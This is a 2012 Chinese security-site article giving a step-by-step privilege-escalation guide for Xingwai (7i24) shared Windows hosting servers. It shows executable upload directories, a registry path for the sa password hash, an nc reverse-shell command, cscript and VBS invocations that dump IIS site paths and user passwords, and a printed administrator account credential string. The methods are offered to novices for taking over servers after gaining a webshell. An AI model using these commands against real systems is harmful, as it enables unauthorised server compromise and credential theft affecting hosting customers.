设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:首页 > 网络安全 > Web安全 > 正文

星外主机的一些提权方法总结

时间:2012-12-06 13:18 来源:未知 作者:www.secye.com 阅读:

最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,收集了一下信息,根据信息知道是星外的.

对新手来说在这里很容易陷入困境!

星外sa密码注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位MD5加密很多情况下MD5跑不出有高人找到了个可写可执行目录C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ cmd.exe上传在这里可以执行些简单的命令如: set,systeminfo,ipconfig,ping,等~利用这些命令可以收到比较多的系统信息.

如果你比较幸运管理配置不当的话还可以DIR C.D.E等其他盘,很久以前小K(khjl1)给我发了个for命令利用,for命令比dir执行权限要小 类似dir的功能 大家可以在不能dir的情况下试下

for /r d:\freehost\ %i in (test) do @echo %i >>C:\路径\1.txt 把d:\freehost\所有文件写入1.txt在用VBS读IIS密码时候很多提到NC反弹,其实不需要 很多情况下NC根本反弹不了,防火墙都挡住了.成功率很底。 如果你失败了而非得继续NC的话可以试下这个兄弟的,大家或许可以根据这个方法测试下。反弹cmdshell:

“c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe”

通常都不会成功。

而直接在 cmd路径上 输入 c:\windows\temp\nc.exe

命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。

******我是没成功,呵呵******

systeminfo看了下管理把补丁打得很齐全用VBS提权测试 这里我们可以把iis.vbs上传到WEB跟目录下而不必传到Media Index目录但是提权工具必须传到Media Index才有权限执行切记~ C:\Documents and Settings\下有空格所以得用”"包含 如:

CmdPath:

C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cmd.exe

Argument:

/c “c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe” d:\freehost\web\1.vbs

不包含的话会提示失败,所以细节决定成败!

iis.vbs列出了所有域名和路径当然也包括我们的目标站,试下用TYPE命令目标数据配置信息(提权下可以读些MSSQL或MYSQL的WEB配置等~~~信息方便提权)我这里只针对目标,这里库是ACCESS的 再结合手上的几个VBS读IIS用户和密码 用读出的密码21端口可以连接 收工!

经常有人问我要免杀LCX,其实如果支持ASPX的话上面有个PortMap功能很多人没注意还是什么的,这个类似LCX做转发,在支持ASPX的站上就别传什么LCX了.免杀还麻烦以上根据别人和自己经验整理,其实也很简单的,方便些新手学习 如有不足请提醒.

补充: www.secye.com

星外虚拟机一直被认为很BT,其实我感 觉还是很好搞,至少他支持aspx。找到有的执行目录一般99% 可以秒杀他 ,拿下服务器权限。

星外可执行的目录最新版本C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ 这个目录,还有就是C:\PHP\PEAR 这个目录。C:\PHP\PEAR在10,11月份的时候我还发现很多虚拟机可写可执行的,现在发现的不是很多了。C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ 这个目录论坛提到过很多次了,昨晚杀虫剂的文章也写的很明白了。

星外的最大的BUG就是 FTP是系统自带的,里面可以 通过列IIS配置信息 列出来。(上传个cscript.exe和 修改过的adsutil.vbs)

7i24虚拟主机管理平台受控端freehostrunat fa41328538d7be36e83ae91a78a1b16f!7

Freehostrunat这个用户是安装星外时候建立的,属于administrators用户组里的。到这里估计还是有人不明白 这个用户fa41328538d7be36e83ae91a78a1b16f!7 是什么加密方式。我先前也这样犯傻过,还跑去翻星外有关的注册表,配置文件等等,到最后还是没解密出来。后来想了想,他的验证过程不可能加密的,因为windows自带的FTP又不会识别他的这密文,其他网站都是明文,所以直接登陆就行

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%